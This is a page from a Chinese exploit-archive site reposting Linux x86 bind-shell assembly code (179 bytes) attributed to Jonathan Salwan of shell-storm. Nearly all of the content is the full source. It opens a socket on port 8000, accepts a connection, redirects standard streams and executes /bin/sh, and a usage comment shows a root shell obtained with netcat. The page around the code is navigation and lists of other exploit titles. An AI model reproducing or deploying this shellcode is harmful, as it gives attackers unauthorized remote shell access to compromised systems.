首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 Bind ASM Code Linux 179 bytes
来源:http://www.shell-storm.org 作者:Salwan 发布时间:2009-06-02  

;
; Title : Bind asm code Linux x86 - 179 bytes
; IP : 0.0.0.0
; Port : 8000
;
;
; Use : nc localhost 8000
;   id 
;   uid=0(root) gid=0(root) groupes=0(root)
;
;
; Author : Jonathan Salwan
; Mail  : submit AT shell-storm.org
; Web  : http://www.shell-storm.org
;
;
; More shellcodes in => http://www.shell-storm.org/shellcode/
;


section .data
name db '/bin/sh', 0
section .text
global _start

_start:
;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;;
push byte 0x0
push byte 0x1
push byte 0x2

mov eax,  0x66
mov ebx,  0x1
mov ecx,  esp
int  0x80
;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;;

mov  edx,  eax

;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;;
push byte 0x0
push byte 0x0
push byte 0x0
push word 0x401f
push word 0x2
mov ebx,  esp

push  byte 0x10
push ebx
push edx

mov eax,  0x66
mov ebx,  0x2
mov ecx,  esp
int  0x80
;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;;
push byte 0x1
push edx

mov eax, 0x66
mov ebx, 0x4
mov ecx,  esp
int  0x80
;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;;
push byte 0x0
push byte 0x0
push edx

mov eax,  0x66
mov ebx,  0x5
mov ecx,  esp
int  0x80
;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;;

mov edx,  eax

;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;;
mov eax,  0x3f
mov ebx,  edx
mov  ebx,  0x2
int 0x80

mov     eax,  0x3f
mov     ebx,  edx
mov     ecx,  0x1
int     0x80

mov     eax,  0x3f
mov     ebx,  edx
mov     ecx,  0x0
int     0x80
;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;;
mov al,  0x0b
mov ebx,  name
push byte 0x0
push name
mov ecx,  esp
mov  edx,  0x0
int  0x80
;;;;;;;;;;;;;;;;;;;;Execve();;;;;;;;;;;;;;;;;;;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache mod_dav / svn Remote De
·ASP Football Pool 2.3 Remote D
·Unclassified NewsBoard 1.6.4 M
·The Linksys WAG54G2 web manage
·Roxio CinePlayer 3.2 (IAManage
·Apple iTunes 8.1.1 (ITMS) Mult
·RadCLASSIFIEDS Gold v2 (seller
·Atomix Virtual Dj Pro 6.0 Stac
·EXPLOIT Online Grades & Attend
·Podcast Generator <= 1.2 unaut
·ICQ 6.5 URL Search Hook / ICQT
·Joomla Component Seminar 1.28
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved